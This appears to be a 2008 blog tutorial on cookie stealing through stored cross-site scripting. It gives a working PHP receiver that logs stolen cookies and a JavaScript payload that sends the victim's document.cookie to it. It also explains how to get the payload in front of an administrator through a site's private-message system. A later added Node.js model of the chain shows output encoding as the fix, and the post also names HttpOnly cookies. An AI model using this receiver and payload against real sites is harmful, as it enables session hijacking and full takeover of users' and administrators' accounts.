
Thursday, February 14, 2008

Cookie Stealing

Let's first start off by describing what this is, how to implement it, and why you need to protect against it.

Cookie Stealing:
Cookie Stealing is composed of two parts: a Sender and a Receiver. The sender is the piece that runs in the victim's browser and ships the cookie off; how to implement one is covered further down. The receiver is something on a server the attacker controls that accepts what the sender delivers and records it. Although this sounds simple, getting the sender in front of the right victim is the part that takes some work.

Implementation:
The following is a sample PHP script for a receiver (shown here without the spaces Blogspot forced into the original listing; save it as receiver.php):

<?php
// Receiver: the sender appends the stolen cookie to the URL as ?hijackedcookie=...
// $_GET replaces the old $HTTP_GET_VARS array, which later PHP versions removed.
$hijackedcookie = isset($_GET["hijackedcookie"]) ? $_GET["hijackedcookie"] : "";
// Open the log file for appending, write the cookie on its own line, and close the handle
$file = fopen('cookielog.txt', 'a');
fwrite($file, $hijackedcookie . "\n\n");
fclose($file);
?>


Now, that would be placed on some remote server. For our example we'll be using localhost so as not to point at someone's actual site. Now that we have our receiver, we need a way to get the information sent to it. On to the sender. The following snippet, once it runs in a victim's browser, sends that browser's cookies for the current site to the receiver:


<script type="text/javascript">
// Send the victim's cookie to the receiver. encodeURIComponent keeps characters
// such as & or # inside the cookie from being read as part of the URL instead of the value.
document.location = "http://localhost/receiver.php?hijackedcookie=" + encodeURIComponent(document.cookie);
</script>


Now the tricky part is getting the above onto a page the victim will load. One way is to send the administrator of a site a private message containing it. This only works if the site has a user-to-user messaging system, the site inserts message text into the page without HTML-encoding it (a stored cross-site scripting flaw), and the administrator has JavaScript enabled. Once the administrator opens the message, the script runs in his browser and the receiver is handed the cookie for the session he is currently using.
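The three pieces described above, modelled end to end as an added example (not code from the original post), runnable under Node.js with no network or files involved: the sender's URL construction, the receiver's extraction and logging, and the messaging page whose missing output encoding is what lets the payload run, beside the encoded version that neutralises it. The receiver URL, function names and the sample cookie are assumptions made for the example.

```javascript
// Added example: a self-contained model of the cookie-stealing chain the post
// describes. Everything below (names, receiver URL, sample cookie) is assumed
// for illustration; the post itself only shows receiver.php and the <script>.

const RECEIVER = "http://localhost/receiver.php"; // assumed, as in the post

// --- 1. Sender ---------------------------------------------------------
// What the injected <script> does: build the URL the victim's browser will be
// redirected to. encodeURIComponent matters because a cookie string can hold
// '&', '#' or '=' which the URL parser would otherwise treat as delimiters.
function buildExfilUrl(cookieString, receiver = RECEIVER) {
  return receiver + "?hijackedcookie=" + encodeURIComponent(cookieString);
}

// --- 2. Receiver -------------------------------------------------------
// What receiver.php does, with cookielog.txt replaced by an in-memory array so
// the example has no side effects. Returns the value that would be logged, or
// null when the request carries no hijackedcookie parameter.
const cookieLog = [];
function receive(requestUrl, log = cookieLog) {
  const url = new URL(requestUrl);
  const stolen = url.searchParams.get("hijackedcookie");
  if (stolen === null) return null;
  log.push(stolen);
  return stolen;
}

// --- 3. Messaging page: vulnerable and fixed ---------------------------
// The delivery route in the post only works if the site drops message bodies
// into its HTML unchanged. That is a stored cross-site scripting bug.
function renderMessageUnsafe(from, body) {
  return `<div class="msg"><b>${from}</b>: ${body}</div>`;
}

// The fix: HTML-encode anything user-supplied before it reaches the page. The
// five characters below are the ones that can open a tag, attribute or entity;
// encoding them turns the payload into inert text that is merely displayed.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderMessageSafe(from, body) {
  return `<div class="msg"><b>${escapeHtml(from)}</b>: ${escapeHtml(body)}</div>`;
}

// Rough check used only by this example: would a browser see a script tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// --- Walk-through with constructed data ---------------------------------
const adminCookie = "PHPSESSID=3f9a1b2c; user=admin&role=1"; // constructed sample
const payload =
  '<script>document.location="' + RECEIVER +
  '?hijackedcookie="+encodeURIComponent(document.cookie);</script>';

const exfilUrl = buildExfilUrl(adminCookie);
console.log("sender redirects to:", exfilUrl);
console.log("receiver logs:      ", receive(exfilUrl));
// Without encoding, everything after the '&' in the cookie is lost on the way:
console.log("unencoded variant:  ", receive(RECEIVER + "?hijackedcookie=" + adminCookie, []));
console.log("unsafe page runs payload:", containsScriptTag(renderMessageUnsafe("mallory", payload)));
console.log("safe page runs payload:  ", containsScriptTag(renderMessageSafe("mallory", payload)));
```

The unencoded redirect in the walk-through shows why the original sender snippet can silently lose part of the cookie: the receiver only sees what comes before the first `&`. The encoded page output is the check that actually matters on the defending side; with it in place the message still displays the attacker's text, but no script tag reaches the parser.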

Security Risks:
It is quite obvious that this poses a huge security risk. If someone gets hold of a session cookie, they can present it to the site and pose as that user, which gives them every access right that user has on the site. For instance, if this is done to a web admin, the hijacker now has the rights to view or delete anything and everything on the website that the admin can reach from a browser. Two defences follow directly from how the attack works: set session cookies with the HttpOnly flag so that document.cookie cannot read them, and HTML-encode anything a user typed before the site displays it, so a message body can never become a script.



* The above information was gathered from multiple websites, but mostly http://www.freakwolfe.cheezyfilms.com/
